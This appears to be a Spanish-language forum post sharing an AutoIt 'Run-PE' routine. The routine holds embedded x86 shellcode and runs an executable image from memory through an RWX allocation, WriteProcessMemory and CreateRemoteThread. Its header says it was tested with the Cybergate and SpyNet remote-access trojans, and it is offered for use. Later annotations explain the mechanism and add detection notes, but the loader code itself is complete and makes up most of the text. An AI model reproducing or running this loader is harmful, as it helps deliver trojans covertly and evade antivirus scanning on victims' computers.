Hace tiempo que no me conecto por cosas del trabajo que por estas fechas me toman todo el tiempo, pero no estoy muerto.... Andaré inactivo por algún tiempo más, pero pronto volveré....
Los dejo a disfrutar ....
Saludos
# ================================================
# Run-PE v2.0 [ Fasm ShellCode ]
# Run Exe Buffer From Memory ( Not Remote )
# Author : M3
# Thanks : DeadlyVermilion [ ShellCode ]
# Pirate-Inc (DZ)
# Pink
# Tested on XP SP3 | Win7 32 With Cybergate | SpyNet
# Usage : sRunFromMemory(SomeBinaryBuffer)
# Enjoy !!!
# ================================================
; Runs the PE image held in $sBinaryBuffer from memory inside the current
; process. One VirtualAlloc'd region receives the layout
; [image][embedded shellcode][15-byte call stub]; a new thread is then started
; at the stub with CreateRemoteThread against @AutoItPID, and the stub passes
; the two buffer addresses to the shellcode.
;
; Parameter: $sBinaryBuffer - the PE image (see "Usage" in the header). Every
;   size below is derived with StringLen(), so the struct layout depends on
;   whether a binary variant or a hex string is passed - TODO confirm against
;   the caller.
; Returns: nothing. Every failure path calls Exit (ends the whole script)
;   instead of Return, so a caller never observes an error; the Exit paths
;   after VirtualAlloc also leave the RWX region and the process handle open.
; Platform: handles are marshalled as "int" and addresses are rebuilt from an
;   8-hex-digit pointer string, i.e. 32-bit only (header: tested on 32-bit).
; Detection note: a PAGE_EXECUTE_READWRITE allocation followed by
;   WriteProcessMemory + CreateRemoteThread on the process's own PID is a
;   well-known self-injection sequence; API-monitoring and memory-scanning
;   tooling can key on exactly this call chain and on the private RWX region.
Func sRunFromMemory($sBinaryBuffer)
; $sLenShellCode and $i (used below) are not in this Local list and are created
; implicitly (errors under Opt("MustDeclareVars", 1)); $sObject is never used.
Local $sProcess , $sRemote_Tread , $sObject , $sMemoryStruct , $sStructPointer , $sStructShellCode , _
$sStructSize ,$sExeBuffer ,$sShellCodeBuffer,$sAsmBuffer ,$sLenExePath ,$sShellCode[19], $sShellBuffer , _
$sAsmCode , $sAsmLen , $sExeAlocateBuffer , $sMemoryAsmStruct , $sAsmBufferDest , $sAsmMemoryData
Local Const $sKernel32 = "kernel32"
; Rejects an empty buffer; the message is written and then the script exits.
If Not $sBinaryBuffer <> "" Then
ConsoleWrite('Binary buffer not Exists , Choose an .exe File to Read First ...' )
Exit
EndIf
; 18 hex chunks of fixed 32-bit code (FASM, per the header). What it does is
; opaque from here; the header says it performs the in-memory load. For a
; defender this constant hex is a stable, signature-bearing artifact.
$sShellCode[1] = '0X8BEC81C4A4FAFFFF8945FCE81B0200008985CCFDFFFFBBF20F56C68B95CCFDFFFFE819020000894'
$sShellCode[2] = '5F8BBA98B802D8B95CCFDFFFFE8060200008945F4BB853BAEDB8B95CCFDFFFFE8F30100008945F0BB'
$sShellCode[3] = '9335DF858B95CCFDFFFFE8E00100008945ECBB8DCBB65D8B95CCFDFFFFE8CD0100008945E8BB5313C'
$sShellCode[4] = '1788B95CCFDFFFFE8BA0100008945E4BB8ADBDFA58B95CCFDFFFFE8A70100008945E0BB2E0550C88B'
$sShellCode[5] = '95CCFDFFFFE8940100008945DCBB85A116A28B95CCFDFFFFE881010000E8060000006E74646C6C005'
$sShellCode[6] = 'F57FFD08985D0FDFFFFBB8BE3CD418BD0E8600100008945D8BB39230D2C8B95D0FDFFFFE84D010000'
$sShellCode[7] = '8945D468000200008D85D4FDFFFF506A00FF55F86A448D8588FDFFFF50FF55D4FF55F48BC88D8578F'
$sShellCode[8] = 'DFFFF508D8588FDFFFF506A006A006A046A006A006A00518D85D4FDFFFF50FF55F068CC0200008D85'
$sShellCode[9] = 'A4FAFFFF50FF55D4C785A4FAFFFF020001008D85A4FAFFFF50FFB57CFDFFFFFF55EC64A1300000008'
$sShellCode[10] = 'B400C8B40148B401050FFB578FDFFFFFF55D88B7DFC037F3C6A406800300000FF7750FF7734FFB57'
$sShellCode[11] = '8FDFFFFFF55E8898574FDFFFF6A00FF7754FF75FCFFB574FDFFFFFFB578FDFFFFFF55E48D4718898'
$sShellCode[12] = '570FDFFFF0FB74714018570FDFFFF33C033F633C9EB296BC628038570FDFFFF8B9D74FDFFFF03580'
$sShellCode[13] = 'C8B55FC0350146A00FF70105253FFB578FDFFFFFF55E446663B770672D18B8574FDFFFF034728898'
$sShellCode[14] = '554FBFFFF8D85A4FAFFFF50FFB57CFDFFFFFF55E0FFB57CFDFFFFFF55DCC9C364A1300000008B400'
$sShellCode[15] = 'C8B400C8B008B008B4018C3558BEC83C4F4528955FC8B4A3C03CA894DF48B497803CA894DF88B511'
$sShellCode[16] = '88B4920034DFC33FF8B310375FC33C051AC8BC803F8D3C785C075F5593BFB741083C1044A75E0BAC'
$sShellCode[17] = '258621B5A33C0C9C38B45FC8B4DF88B59188B492403C82BDAD1E303CB0FB7198B4DF88B491C03C8C'
$sShellCode[18] = '1E30203CB03015AC9C300'
; Join the chunks; the "0X" prefix of chunk 1 leads the whole string.
For $i = 1 to 18
$sShellBuffer &= $sShellCode[$i]
Next
$sLenExePath = StringLen($sBinaryBuffer)
; Hex chars / 2 counts the "0X" prefix as one extra byte, hence the "- 1"
; wherever the shellcode byte count is needed below.
$sLenShellCode = StringLen($sShellBuffer) / 2
; One struct with three 1-byte-element members (Boolean presumably is AutoIt's
; 1-byte type): the image, the shellcode bytes, and a 15-byte slot for the stub.
$sMemoryStruct = DllStructCreate ("Boolean BinaryBuffer[" & $sLenExePath & "];Boolean ShellCodeBuffer[" & $sLenShellCode - 1 & "];Boolean AsmCode[15]")
$sStructPointer = DllStructGetPtr ($sMemoryStruct , 1)
$sStructShellCode = DllStructGetPtr ($sMemoryStruct , 2)
$sStructSize = DllStructGetSize ($sMemoryStruct)
; VirtualAlloc(NULL, size, 4096 = MEM_COMMIT, 64 = PAGE_EXECUTE_READWRITE):
; a writable+executable private region, the classic loader tell.
$sExeAlocateBuffer = DllCall($sKernel32, "ptr", "VirtualAlloc", "ptr", 0, "dword_ptr", $sStructSize, "dword", 4096, "dword", 64)
; Only the DllCall result shape is checked; a NULL (failed) allocation still
; returns an array, so $sExeBuffer = 0 would pass this test.
If IsArray($sExeAlocateBuffer) Then
$sExeBuffer = $sExeAlocateBuffer[0]
Else
ConsoleWrite ('Unable to Allocate Virtual Memory')
Exit
EndIf
; Address of the shellcode inside the RWX region: image address + image size.
$sShellCodeBuffer = $sExeBuffer + $sLenExePath
; Build the call stub as hex: 8D05 <image addr> (lea eax), 8D1D <shellcode
; addr> (lea ebx), FFD3 (call ebx), C3 (ret). The 11..3 step -2 loop reads the
; "0x........" pointer string two hex digits at a time from the end, giving
; little-endian byte order; index 11 is past an 8-digit address and yields "",
; so exactly 4 bytes are emitted. Relies on the ptr+int result still printing
; as 0x-prefixed hex - TODO confirm.
$sAsmCode = "0X8D05"
For $i = 11 To 3 Step -2
$sAsmCode &= StringMid ($sExeBuffer , $i , 2)
Next
$sAsmCode &= "8D1D"
For $i = 11 To 3 Step -2
$sAsmCode &= StringMid ($sShellCodeBuffer , $i , 2)
Next
$sAsmCode &= "FFD3C3"
; Stub byte count excluding the "0X" prefix: 15 when both addresses are
; 4 bytes, matching the AsmCode[15] member above.
$sAsmLen = StringLen($sAsmCode) / 2 - 1
; Stage the stub in its own struct, then copy it into member 3 of the main
; struct with the raw, unchecked CopyMemory helper defined below.
$sMemoryAsmStruct = DllStructCreate("Boolean AsmCopyMemory[" & $sAsmLen & "]")
DllStructSetData($sMemoryAsmStruct, 1, $sAsmCode)
$sAsmBufferDest = DllStructGetPtr($sMemoryStruct, 3)
$sAsmMemoryData = DllStructGetPtr($sMemoryAsmStruct , 1)
CopyMemory($sAsmBufferDest, $sAsmMemoryData , $sAsmLen)
; Fill the image and shellcode members. Whether DllStructSetData stores the
; raw bytes of a hex/binary value into a Boolean[] member is not verifiable
; from here - TODO confirm.
DllStructSetData ($sMemoryStruct, 1 ,$sBinaryBuffer)
DllStructSetData ($sMemoryStruct, 2 ,$sShellBuffer)
; OpenProcess(0x001f0fff = PROCESS_ALL_ACCESS, no inherit, own PID).
$sProcess = DllCall($sKernel32, "int", "OpenProcess", "int", 0x001f0fff, "int", 0, "int", @AutoItPID)
; A NULL handle (OpenProcess failure) is not detected: only IsArray/@error are
; tested, not $sProcess[0].
If IsArray($sProcess) And Not @error Then
$sProcess = $sProcess[0]
; Copy the whole struct (image + shellcode + stub) into the RWX region;
; lpNumberOfBytesWritten is passed as NULL.
DllCall($sKernel32, "int", "WriteProcessMemory", "int", $sProcess, "ptr", $sExeBuffer, "ptr", $sStructPointer, "int", $sStructSize, "int", 0)
; Thread start address = the stub, which sits right after the shellcode bytes.
$sAsmBuffer = $sShellCodeBuffer + $sLenShellCode - 1
Else
ConsoleWrite('Unable to Open Process')
Exit
Endif
; CreateRemoteThread(hProcess, NULL, 0, start = stub, NULL, 0, NULL) on the
; process's own handle.
$sRemote_Tread = DllCall($sKernel32, "int", "CreateRemoteThread", "int", $sProcess, "ptr", 0, "int", 0, "int", $sAsmBuffer, "ptr", 0, "int", 0, "int", 0)
; As above, a NULL thread handle is not detected. The wait is capped at 100 ms
; and the region is then released (0X8000 = MEM_RELEASE) whether or not the
; thread finished, so a still-running thread loses its code and data. The
; thread handle is never closed; only the process handle is.
if IsArray ($sRemote_Tread) And Not @error Then
$sRemote_Tread = $sRemote_Tread[0]
DllCall($sKernel32, "int", "WaitForSingleObject", "int", $sRemote_Tread, "int", 100)
DllCall($sKernel32, "int", "CloseHandle", "int", $sProcess)
DllCall($sKernel32, "bool", "VirtualFree", "ptr", $sExeBuffer, "dword_ptr", 0, "dword", 0X8000)
Else
ConsoleWrite ('Unable to Create Thread')
Exit
EndIf
EndFunc
; Raw memory copy: copies $len bytes from $Source to $Des with no bounds,
; overlap or NULL checks, and no return value ($Ret is assigned but never
; returned, so callers cannot tell whether the copy ran). Used above to place
; the call stub into the main struct.
; Mechanism: the hex in $ASM is a small x86 routine (load edi/esi/ecx from the
; stack, rep movsb, ret) placed in a DllStruct buffer and entered through
; user32!CallWindowProcW, whose (hWnd, Msg, wParam, lParam) slots deliver
; ($Des, $Source, $len, 0) on the stack. Executing heap-backed struct memory
; this way presumes that memory is executable (DEP-dependent) - TODO confirm.
; Detection note: CallWindowProc invoked with a pointer into a heap buffer
; instead of a window procedure is a recognisable execute-from-data pattern.
; $des/$source below differ only in case from the parameters; AutoIt variable
; names are case-insensitive, so they are the same variables.
Func CopyMemory($Des,$Source,$len)
; Trailing 00 bytes pad the code. BinaryLen sizes the struct from the hex
; string - presumably a "0x" string converts to binary byte-wise; TODO confirm.
local $ASM = "0x8B7C24048B74240831C98B4C240CF3A4C300000000000000"
Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
DllStructSetData($BufferASM, 1, $ASM)
Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
"ptr", DllStructGetPtr($BufferASM), _
"ptr", $des, _
"ptr", $source, _
"int", $len, _
"int", 0)
EndFunc